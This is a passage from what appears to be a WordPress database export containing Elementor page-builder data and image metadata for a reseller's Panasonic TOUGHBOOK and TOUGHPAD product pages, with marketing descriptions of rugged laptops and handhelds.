]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e414452\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0318f25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><\\/div><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07cdd64\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><\\/div><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"730c08e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\" style=\\\"font-size: 1rem; line-height: 1.4rem; margin-top: 1.5rem; margin-bottom: 1rem; color: #000000; font-weight: 500; font-family: DINOT, Arial, Helvetica, sans-serif;\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\" style=\\\"color: #000000; font-family: DINOT, Arial, Helvetica, sans-serif; font-size: 16px;\\\"><p style=\\\"margin-top: 1rem; margin-bottom: 1rem;\\\">The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><\\/div><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3337,2601,'_wp_attached_file','2018/12/fz-t1_image1-1_ss_1.jpg'),(3338,2601,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:277;s:6:\"height\";i:389;s:4:\"file\";s:31:\"2018/12/fz-t1_image1-1_ss_1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"fz-t1_image1-1_ss_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"fz-t1_image1-1_ss_1-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"fz-t1_image1-1_ss_1-277x150.jpg\";s:5:\"width\";i:277;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"fz-t1_image1-1_ss_1-277x300.jpg\";s:5:\"width\";i:277;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"fz-t1_image1-1_ss_1-14x20.jpg\";s:5:\"width\";i:14;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3343,2604,'_wp_attached_file','2018/12/fz-n1_mk2_android_image_2_1.jpg'),(3344,2604,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:416;s:6:\"height\";i:389;s:4:\"file\";s:39:\"2018/12/fz-n1_mk2_android_image_2_1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"fz-n1_mk2_android_image_2_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"fz-n1_mk2_android_image_2_1-300x281.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"fz-n1_mk2_android_image_2_1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"fz-n1_mk2_android_image_2_1-416x300.jpg\";s:5:\"width\";i:416;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:37:\"fz-n1_mk2_android_image_2_1-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3341,2603,'_wp_attached_file','2018/12/236380_F1X1_Hero.png'),(3342,2603,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:210;s:6:\"height\";i:389;s:4:\"file\";s:28:\"2018/12/236380_F1X1_Hero.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"236380_F1X1_Hero-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"236380_F1X1_Hero-162x300.png\";s:5:\"width\";i:162;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"236380_F1X1_Hero-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"236380_F1X1_Hero-210x300.png\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"236380_F1X1_Hero-11x20.png\";s:5:\"width\";i:11;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3349,2605,'_elementor_version','0.4'),(3352,2606,'_elementor_edit_mode','builder'),(3353,2606,'_elementor_template_type','post'),(3354,2606,'_wp_page_template','template-fullwidth.php'),(3355,2606,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"justify\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"imag